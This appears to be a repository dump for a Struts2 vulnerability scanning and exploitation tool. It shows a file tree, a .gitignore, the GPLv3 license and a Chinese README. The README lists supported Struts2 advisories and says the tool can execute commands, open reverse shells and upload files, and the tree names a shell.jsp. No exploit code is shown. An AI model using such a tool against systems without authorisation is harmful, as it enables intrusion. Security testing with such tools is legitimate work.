├── .gitignore
├── LICENSE
├── README.md
├── Struts2Scan.py
├── Struts2环境
    ├── S2-001.war
    ├── S2-003.war
    ├── S2-005.war
    ├── S2-005_2.war
    ├── S2-007.war
    ├── S2-008.war
    ├── S2-009.war
    ├── S2-012.war
    ├── S2-013.war
    ├── S2-015.war
    ├── S2-016.war
    ├── S2-019.war
    ├── S2-032.war
    ├── S2-037.war
    ├── S2-045.war
    └── 其他环境.txt
└── shell.jsp


/.gitignore:
--------------------------------------------------------------------------------
  1 | # Byte-compiled / optimized / DLL files
  2 | __pycache__/
  3 | *.py[cod]
  4 | *$py.class
  5 | 
  6 | # C extensions
  7 | *.so
  8 | 
  9 | # Distribution / packaging
 10 | .Python
 11 | build/
 12 | develop-eggs/
 13 | dist/
 14 | downloads/
 15 | eggs/
 16 | .eggs/
 17 | lib/
 18 | lib64/
 19 | parts/
 20 | sdist/
 21 | var/
 22 | wheels/
 23 | *.egg-info/
 24 | .installed.cfg
 25 | *.egg
 26 | MANIFEST
 27 | 
 28 | # PyInstaller
 29 | #  Usually these files are written by a python script from a template
 30 | #  before PyInstaller builds the exe, so as to inject date/other infos into it.
 31 | *.manifest
 32 | *.spec
 33 | 
 34 | # Installer logs
 35 | pip-log.txt
 36 | pip-delete-this-directory.txt
 37 | 
 38 | # Unit test / coverage reports
 39 | htmlcov/
 40 | .tox/
 41 | .coverage
 42 | .coverage.*
 43 | .cache
 44 | nosetests.xml
 45 | coverage.xml
 46 | *.cover
 47 | .hypothesis/
 48 | .pytest_cache/
 49 | 
 50 | # Translations
 51 | *.mo
 52 | *.pot
 53 | 
 54 | # Django stuff:
 55 | *.log
 56 | local_settings.py
 57 | db.sqlite3
 58 | 
 59 | # Flask stuff:
 60 | instance/
 61 | .webassets-cache
 62 | 
 63 | # Scrapy stuff:
 64 | .scrapy
 65 | 
 66 | # Sphinx documentation
 67 | docs/_build/
 68 | 
 69 | # PyBuilder
 70 | target/
 71 | 
 72 | # Jupyter Notebook
 73 | .ipynb_checkpoints
 74 | 
 75 | # pyenv
 76 | .python-version
 77 | 
 78 | # celery beat schedule file
 79 | celerybeat-schedule
 80 | 
 81 | # SageMath parsed files
 82 | *.sage.py
 83 | 
 84 | # Environments
 85 | .env
 86 | .venv
 87 | env/
 88 | venv/
 89 | ENV/
 90 | env.bak/
 91 | venv.bak/
 92 | 
 93 | # Spyder project settings
 94 | .spyderproject
 95 | .spyproject
 96 | 
 97 | # Rope project settings
 98 | .ropeproject
 99 | 
100 | # mkdocs documentation
101 | /site
102 | 
103 | # mypy
104 | .mypy_cache/
105 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                     GNU GENERAL PUBLIC LICENSE
  2 |                        Version 3, 29 June 2007
  3 | 
  4 |  Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
  5 |  Everyone is permitted to copy and distribute verbatim copies
  6 |  of this license document, but changing it is not allowed.
  7 | 
  8 |                             Preamble
  9 | 
 10 |   The GNU General Public License is a free, copyleft license for
 11 | software and other kinds of works.
 12 | 
 13 |   The licenses for most software and other practical works are designed
 14 | to take away your freedom to share and change the works.  By contrast,
 15 | the GNU General Public License is intended to guarantee your freedom to
 16 | share and change all versions of a program--to make sure it remains free
 17 | software for all its users.  We, the Free Software Foundation, use the
 18 | GNU General Public License for most of our software; it applies also to
 19 | any other work released this way by its authors.  You can apply it to
 20 | your programs, too.
 21 | 
 22 |   When we speak of free software, we are referring to freedom, not
 23 | price.  Our General Public Licenses are designed to make sure that you
 24 | have the freedom to distribute copies of free software (and charge for
 25 | them if you wish), that you receive source code or can get it if you
 26 | want it, that you can change the software or use pieces of it in new
 27 | free programs, and that you know you can do these things.
 28 | 
 29 |   To protect your rights, we need to prevent others from denying you
 30 | these rights or asking you to surrender the rights.  Therefore, you have
 31 | certain responsibilities if you distribute copies of the software, or if
 32 | you modify it: responsibilities to respect the freedom of others.
 33 | 
 34 |   For example, if you distribute copies of such a program, whether
 35 | gratis or for a fee, you must pass on to the recipients the same
 36 | freedoms that you received.  You must make sure that they, too, receive
 37 | or can get the source code.  And you must show them these terms so they
 38 | know their rights.
 39 | 
 40 |   Developers that use the GNU GPL protect your rights with two steps:
 41 | (1) assert copyright on the software, and (2) offer you this License
 42 | giving you legal permission to copy, distribute and/or modify it.
 43 | 
 44 |   For the developers' and authors' protection, the GPL clearly explains
 45 | that there is no warranty for this free software.  For both users' and
 46 | authors' sake, the GPL requires that modified versions be marked as
 47 | changed, so that their problems will not be attributed erroneously to
 48 | authors of previous versions.
 49 | 
 50 |   Some devices are designed to deny users access to install or run
 51 | modified versions of the software inside them, although the manufacturer
 52 | can do so.  This is fundamentally incompatible with the aim of
 53 | protecting users' freedom to change the software.  The systematic
 54 | pattern of such abuse occurs in the area of products for individuals to
 55 | use, which is precisely where it is most unacceptable.  Therefore, we
 56 | have designed this version of the GPL to prohibit the practice for those
 57 | products.  If such problems arise substantially in other domains, we
 58 | stand ready to extend this provision to those domains in future versions
 59 | of the GPL, as needed to protect the freedom of users.
 60 | 
 61 |   Finally, every program is threatened constantly by software patents.
 62 | States should not allow patents to restrict development and use of
 63 | software on general-purpose computers, but in those that do, we wish to
 64 | avoid the special danger that patents applied to a free program could
 65 | make it effectively proprietary.  To prevent this, the GPL assures that
 66 | patents cannot be used to render the program non-free.
 67 | 
 68 |   The precise terms and conditions for copying, distribution and
 69 | modification follow.
 70 | 
 71 |                        TERMS AND CONDITIONS
 72 | 
 73 |   0. Definitions.
 74 | 
 75 |   "This License" refers to version 3 of the GNU General Public License.
 76 | 
 77 |   "Copyright" also means copyright-like laws that apply to other kinds of
 78 | works, such as semiconductor masks.
 79 | 
 80 |   "The Program" refers to any copyrightable work licensed under this
 81 | License.  Each licensee is addressed as "you".  "Licensees" and
 82 | "recipients" may be individuals or organizations.
 83 | 
 84 |   To "modify" a work means to copy from or adapt all or part of the work
 85 | in a fashion requiring copyright permission, other than the making of an
 86 | exact copy.  The resulting work is called a "modified version" of the
 87 | earlier work or a work "based on" the earlier work.
 88 | 
 89 |   A "covered work" means either the unmodified Program or a work based
 90 | on the Program.
 91 | 
 92 |   To "propagate" a work means to do anything with it that, without
 93 | permission, would make you directly or secondarily liable for
 94 | infringement under applicable copyright law, except executing it on a
 95 | computer or modifying a private copy.  Propagation includes copying,
 96 | distribution (with or without modification), making available to the
 97 | public, and in some countries other activities as well.
 98 | 
 99 |   To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies.  Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 | 
103 |   An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License.  If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 | 
112 |   1. Source Code.
113 | 
114 |   The "source code" for a work means the preferred form of the work
115 | for making modifications to it.  "Object code" means any non-source
116 | form of a work.
117 | 
118 |   A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 | 
123 |   The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form.  A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 | 
134 |   The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities.  However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work.  For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 | 
147 |   The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 | 
151 |   The Corresponding Source for a work in source code form is that
152 | same work.
153 | 
154 |   2. Basic Permissions.
155 | 
156 |   All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met.  This License explicitly affirms your unlimited
159 | permission to run the unmodified Program.  The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work.  This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 | 
164 |   You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force.  You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright.  Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 | 
175 |   Conveying under any other circumstances is permitted solely under
176 | the conditions stated below.  Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 | 
179 |   3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 | 
181 |   No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 | 
187 |   When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 | 
195 |   4. Conveying Verbatim Copies.
196 | 
197 |   You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 | 
205 |   You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 | 
208 |   5. Conveying Modified Source Versions.
209 | 
210 |   You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 | 
214 |     a) The work must carry prominent notices stating that you modified
215 |     it, and giving a relevant date.
216 | 
217 |     b) The work must carry prominent notices stating that it is
218 |     released under this License and any conditions added under section
219 |     7.  This requirement modifies the requirement in section 4 to
220 |     "keep intact all notices".
221 | 
222 |     c) You must license the entire work, as a whole, under this
223 |     License to anyone who comes into possession of a copy.  This
224 |     License will therefore apply, along with any applicable section 7
225 |     additional terms, to the whole of the work, and all its parts,
226 |     regardless of how they are packaged.  This License gives no
227 |     permission to license the work in any other way, but it does not
228 |     invalidate such permission if you have separately received it.
229 | 
230 |     d) If the work has interactive user interfaces, each must display
231 |     Appropriate Legal Notices; however, if the Program has interactive
232 |     interfaces that do not display Appropriate Legal Notices, your
233 |     work need not make them do so.
234 | 
235 |   A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit.  Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 | 
245 |   6. Conveying Non-Source Forms.
246 | 
247 |   You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 | 
252 |     a) Convey the object code in, or embodied in, a physical product
253 |     (including a physical distribution medium), accompanied by the
254 |     Corresponding Source fixed on a durable physical medium
255 |     customarily used for software interchange.
256 | 
257 |     b) Convey the object code in, or embodied in, a physical product
258 |     (including a physical distribution medium), accompanied by a
259 |     written offer, valid for at least three years and valid for as
260 |     long as you offer spare parts or customer support for that product
261 |     model, to give anyone who possesses the object code either (1) a
262 |     copy of the Corresponding Source for all the software in the
263 |     product that is covered by this License, on a durable physical
264 |     medium customarily used for software interchange, for a price no
265 |     more than your reasonable cost of physically performing this
266 |     conveying of source, or (2) access to copy the
267 |     Corresponding Source from a network server at no charge.
268 | 
269 |     c) Convey individual copies of the object code with a copy of the
270 |     written offer to provide the Corresponding Source.  This
271 |     alternative is allowed only occasionally and noncommercially, and
272 |     only if you received the object code with such an offer, in accord
273 |     with subsection 6b.
274 | 
275 |     d) Convey the object code by offering access from a designated
276 |     place (gratis or for a charge), and offer equivalent access to the
277 |     Corresponding Source in the same way through the same place at no
278 |     further charge.  You need not require recipients to copy the
279 |     Corresponding Source along with the object code.  If the place to
280 |     copy the object code is a network server, the Corresponding Source
281 |     may be on a different server (operated by you or a third party)
282 |     that supports equivalent copying facilities, provided you maintain
283 |     clear directions next to the object code saying where to find the
284 |     Corresponding Source.  Regardless of what server hosts the
285 |     Corresponding Source, you remain obligated to ensure that it is
286 |     available for as long as needed to satisfy these requirements.
287 | 
288 |     e) Convey the object code using peer-to-peer transmission, provided
289 |     you inform other peers where the object code and Corresponding
290 |     Source of the work are being offered to the general public at no
291 |     charge under subsection 6d.
292 | 
293 |   A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 | 
297 |   A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling.  In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage.  For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product.  A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 | 
310 |   "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source.  The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 | 
318 |   If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information.  But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 | 
329 |   The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed.  Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 | 
337 |   Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 | 
343 |   7. Additional Terms.
344 | 
345 |   "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law.  If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 | 
354 |   When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it.  (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.)  You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 | 
361 |   Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 | 
365 |     a) Disclaiming warranty or limiting liability differently from the
366 |     terms of sections 15 and 16 of this License; or
367 | 
368 |     b) Requiring preservation of specified reasonable legal notices or
369 |     author attributions in that material or in the Appropriate Legal
370 |     Notices displayed by works containing it; or
371 | 
372 |     c) Prohibiting misrepresentation of the origin of that material, or
373 |     requiring that modified versions of such material be marked in
374 |     reasonable ways as different from the original version; or
375 | 
376 |     d) Limiting the use for publicity purposes of names of licensors or
377 |     authors of the material; or
378 | 
379 |     e) Declining to grant rights under trademark law for use of some
380 |     trade names, trademarks, or service marks; or
381 | 
382 |     f) Requiring indemnification of licensors and authors of that
383 |     material by anyone who conveys the material (or modified versions of
384 |     it) with contractual assumptions of liability to the recipient, for
385 |     any liability that these contractual assumptions directly impose on
386 |     those licensors and authors.
387 | 
388 |   All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10.  If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term.  If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 | 
398 |   If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 | 
403 |   Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 | 
407 |   8. Termination.
408 | 
409 |   You may not propagate or modify a covered work except as expressly
410 | provided under this License.  Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 | 
415 |   However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 | 
422 |   Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 | 
429 |   Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License.  If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 | 
435 |   9. Acceptance Not Required for Having Copies.
436 | 
437 |   You are not required to accept this License in order to receive or
438 | run a copy of the Program.  Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance.  However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work.  These actions infringe copyright if you do
443 | not accept this License.  Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 | 
446 |   10. Automatic Licensing of Downstream Recipients.
447 | 
448 |   Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License.  You are not responsible
451 | for enforcing compliance by third parties with this License.
452 | 
453 |   An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations.  If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 | 
463 |   You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License.  For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 | 
471 |   11. Patents.
472 | 
473 |   A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based.  The
475 | work thus licensed is called the contributor's "contributor version".
476 | 
477 |   A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version.  For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 | 
487 |   Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 | 
492 |   In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement).  To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 | 
499 |   If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients.  "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 | 
513 |   If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 | 
521 |   A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License.  You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 | 
536 |   Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 | 
540 |   12. No Surrender of Others' Freedom.
541 | 
542 |   If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License.  If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all.  For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 | 
552 |   13. Use with the GNU Affero General Public License.
553 | 
554 |   Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work.  The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 | 
563 |   14. Revised Versions of this License.
564 | 
565 |   The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time.  Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 | 
570 |   Each version is given a distinguishing version number.  If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation.  If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 | 
579 |   If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 | 
584 |   Later license versions may give you additional or different
585 | permissions.  However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 | 
589 |   15. Disclaimer of Warranty.
590 | 
591 |   THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW.  EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE.  THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU.  SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 | 
600 |   16. Limitation of Liability.
601 | 
602 |   IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 | 
612 |   17. Interpretation of Sections 15 and 16.
613 | 
614 |   If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 | 
621 |                      END OF TERMS AND CONDITIONS
622 | 
623 |             How to Apply These Terms to Your New Programs
624 | 
625 |   If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 | 
629 |   To do so, attach the following notices to the program.  It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 | 
634 |     <one line to give the program's name and a brief idea of what it does.>
635 |     Copyright (C) <year>  <name of author>
636 | 
637 |     This program is free software: you can redistribute it and/or modify
638 |     it under the terms of the GNU General Public License as published by
639 |     the Free Software Foundation, either version 3 of the License, or
640 |     (at your option) any later version.
641 | 
642 |     This program is distributed in the hope that it will be useful,
643 |     but WITHOUT ANY WARRANTY; without even the implied warranty of
644 |     MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
645 |     GNU General Public License for more details.
646 | 
647 |     You should have received a copy of the GNU General Public License
648 |     along with this program.  If not, see <http://www.gnu.org/licenses/>.
649 | 
650 | Also add information on how to contact you by electronic and paper mail.
651 | 
652 |   If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 | 
655 |     <program>  Copyright (C) <year>  <name of author>
656 |     This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 |     This is free software, and you are welcome to redistribute it
658 |     under certain conditions; type `show c' for details.
659 | 
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License.  Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 | 
664 |   You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | <http://www.gnu.org/licenses/>.
668 | 
669 |   The GNU General Public License does not permit incorporating your program
670 | into proprietary programs.  If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library.  If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License.  But first, please read
674 | <http://www.gnu.org/philosophy/why-not-lgpl.html>.
675 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
  1 | # Struts2-Scan
  2 | 
  3 | + Struts2漏洞利用扫描工具，基于互联网上已经公开的Structs2高危漏洞exp的扫描利用工具，目前支持的漏洞如下: S2-001, S2-003, S2-005, S2-007, S2-008, S2-009, S2-012, S2-013, S2-015, S2-016, S2-019, S2-029, S2-032, S2-033, S2-037, S2-045, S2-046, S2-048, S2-052, S2-053, S2-devMode, S2-057
  4 | + 支持单个URL漏洞检测和批量URL检测，至此指定漏洞利用，可获取WEB路径，执行命令，反弹shell和上传文件，注意，并不是所有的漏洞均支持上述功能，只有部分功能支持
  5 | + 如有错误或者问题欢迎大家提问交流，一起解决
  6 | 
  7 | ## 运行环境
  8 | + Python3.6.X及其以上版本
  9 | + 第三方库: click, requests, bs4
